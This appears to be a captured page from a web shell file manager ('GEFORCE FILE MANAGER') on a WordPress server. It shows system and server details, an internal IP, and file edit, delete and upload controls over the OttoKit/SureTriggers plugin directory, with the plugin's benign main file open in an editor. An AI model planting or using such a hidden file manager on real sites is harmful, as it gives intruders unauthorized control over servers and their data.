[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
suretriggers
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 app
SET
[ DEL ]
📁 assets
SET
[ DEL ]
📁 languages
SET
[ DEL ]
📁 src
SET
[ DEL ]
📄 autoloader.php
809 B
SET
[ EDIT ]
|
[ DEL ]
📄 changelog.txt
39,782 B
SET
[ EDIT ]
|
[ DEL ]
📄 functions.php
11,761 B
SET
[ EDIT ]
|
[ DEL ]
📄 readme.txt
26,735 B
SET
[ EDIT ]
|
[ DEL ]
📄 suretriggers.php
877 B
SET
[ EDIT ]
|
[ DEL ]
📄 tailwind.config.js
1,845 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: suretriggers.php
<?php /** * Plugin Name: OttoKit * Description: OttoKit helps people automate their work by integrating multiple apps and plugins, allowing them to share data and perform tasks automatically. * Author: OttoKit * Author URI: https://ottokit.com/ * Plugin URI: https://ottokit.com/ * Text Domain: suretriggers * Domain Path: /languages * License: GPLv3 * License URI: https://www.gnu.org/licenses/gpl-3.0.html * Version: 1.1.24 * Requires at least: 5.4 * Requires PHP: 5.6 * * @package suretriggers */ /** * Plugin main file */ use SureTriggers\Loader; require_once 'autoloader.php'; require_once 'functions.php'; define( 'SURE_TRIGGERS_FILE', __FILE__ ); /** * Kicking this off by calling 'get_instance()' method */ $loader = Loader::get_instance();